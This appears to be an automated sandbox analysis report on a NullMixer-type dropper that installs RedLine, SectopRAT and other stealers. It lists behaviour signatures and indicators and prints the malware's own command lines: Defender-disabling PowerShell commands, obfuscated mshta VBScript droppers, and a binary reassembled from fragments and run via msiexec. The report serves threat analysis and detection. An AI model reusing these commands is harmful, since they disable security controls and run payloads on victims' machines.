Analysis Overview
SHA256
54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c
Threat Level: Known bad
The file 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe was found to be: Known bad.
Malicious Activity Summary
Gcleaner family
RedLine payload
PrivateLoader
OnlyLogger
Onlylogger family
SectopRAT
Socelars family
Sectoprat family
Socelars
NullMixer
Socelars payload
GCleaner
Nullmixer family
RedLine
SectopRAT payload
Fabookie family
Redline family
Privateloader family
Fabookie
Detect Fabookie payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
ASPack v2.12-2.42
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Looks up geolocation information via web service
Drops Chrome extension
Blocklisted process makes network request
Suspicious use of SetThreadContext
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-22 07:31
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win10v2004-20241007-en
Max time kernel
86s
Max time network
120s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 776 set thread context of 4896 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe |
| PID 5048 set thread context of 3520 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe |
| PID 3936 set thread context of 312 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343342817050" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe
Thu125e541847539.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 4708
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp" /SL5="$40240,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 616
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp" /SL5="$B01D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2564 -ip 2564
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 360
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd30c8cc40,0x7ffd30c8cc4c,0x7ffd30c8cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2
